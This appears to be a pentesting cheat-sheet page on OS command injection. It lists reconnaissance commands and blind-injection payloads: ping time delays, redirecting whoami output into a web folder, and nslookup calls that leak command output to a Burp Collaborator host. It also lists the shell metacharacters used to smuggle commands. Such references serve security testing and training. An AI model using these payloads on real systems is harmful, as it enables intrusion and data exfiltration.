🟩OS Command Injection

OS command injection (also known as shell injection) is a web security vulnerability that allows an attacker to execute arbitrary operating system (OS) commands on the server that is running an application, and typically fully compromise the application and all its data.

Useful commands

Purpose of command	Linux	Windows
Name of current user	whoami	whoami
Operating system	uname -a	ver
Network configuration	ifconfig -a	ipconfig /all
Network connections	netstat -tunl	netstat -an
Running processes	ps -ef	tasklist

Purpose of command

Linux

Windows

Name of current user

whoami

Operating system

uname -a

ver

Network configuration

ifconfig -a

ipconfig /all

Network connections

netstat -tunl

netstat -an

Running processes

ps -ef

tasklist

Blind OS command injection

Method Command

Method	Command
Time delays	`&ping -c 10 127.0.0.1` `\|\|ping+-c+10+127.0.0.1+\|\|`
Redirecting output	`\|\|whoami>/var/www/images/output.txt\|\|`
Out-Of-Band (OOB) DNS lookup. You can use Burp Collaborator	\|\|nslookup+`whoami`.x.burpcollaborator.net\|\| `\|\|nslookup+x.burpcollaborator.net\|\|`

Time delays

&ping -c 10 127.0.0.1

||ping+-c+10+127.0.0.1+||

Redirecting output

||whoami>/var/www/images/output.txt||

Out-Of-Band (OOB) DNS lookup. You can use Burp Collaborator

||nslookup+`whoami`.x.burpcollaborator.net||

||nslookup+x.burpcollaborator.net||

Useful meta characters

&
&&
|
||
;
Newline (0x0a or \n)
`injected command `
$( injected command )

PreviousDirectory Traversal NextServer-Side Request Forgery (SSRF)

Last updated 5 months ago